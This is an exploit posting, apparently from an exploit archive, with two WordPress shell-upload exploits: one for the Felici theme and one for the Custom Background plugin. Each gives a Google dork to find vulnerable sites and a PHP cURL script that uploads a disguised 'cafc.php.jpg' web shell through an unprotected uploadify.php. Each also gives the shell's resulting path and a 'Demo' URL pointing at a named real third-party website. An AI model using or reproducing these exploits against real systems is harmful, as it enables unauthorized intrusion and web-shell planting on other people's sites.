######################################################################################
# Exploit Title   : WordPress Felici Shell Upload
# Google Dork     : inurl:"/wp-content/themes/felici/"
# Date            : 23-03-2014
# Exploit Author  : CaFc Versace
# Vendor Homepage : http://wordpressnull.com/themeforest-felici-v1-7-wordpress-magazine-theme/
# Tested on       : Windows 7
# Contact         : dwi[@]cooyy.net, cafc[@]surabayablackhat.org
#######################################################################################
 

Prooft:
-------------------------------------------------------------------------------------
<?php
 
$uploadfile="cafc.php.jpg";
 
$ch = curl_init("http://127.0.0.1/wp-content/themes/felici/sprites/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
 
?>
-------------------------------------------------------------------------------------


Exploit:
-------------------------------------------------------------------------------------
Shell Access : http://victim/wp-content/themes/felici/sprites/js/cufon-fonts/uploaded/cafc.php.jpg 
---------------------------------------------------------------------------------------
Demo         : http://theportlander.co.uk/wp-content/themes/felici/sprites/js/uploadify/uploadify.php
---------------------------------------------------------------------------------------


######################################################################################
# Exploit Title   : WordPress Custom Background Shell Upload
# Google Dork     : inurl:"/wp-content/plugins/custom-background/"
# Date            : 23-03-2014
# Exploit Author  : CaFc Versace
# Tested on       : Windows 7
# Contact         : dwi[@]cooyy.net, cafc[@]surabayablackhat.org
#######################################################################################
 

Prooft:
-------------------------------------------------------------------------------------
<?php
$uploadfile="cafc.php.jpg";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/plugins/custom-background/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
-------------------------------------------------------------------------------------


Exploit:
-------------------------------------------------------------------------------------
Shell Access        : http://localhost/wp-content/plugins/custom-background/uploadify/cafc.php.jpg
or find ur shell at : http://localhost/wp-content/uploads/[years]/[month]/
---------------------------------------------------------------------------------------
Demo                : http://lakeofthewoodsmn.com/wp-content/plugins/custom-background/uploadify/uploadify.php
---------------------------------------------------------------------------------------


Credits: Agency CaFc
Thanks : SurabayaBlackhat


./learn to be better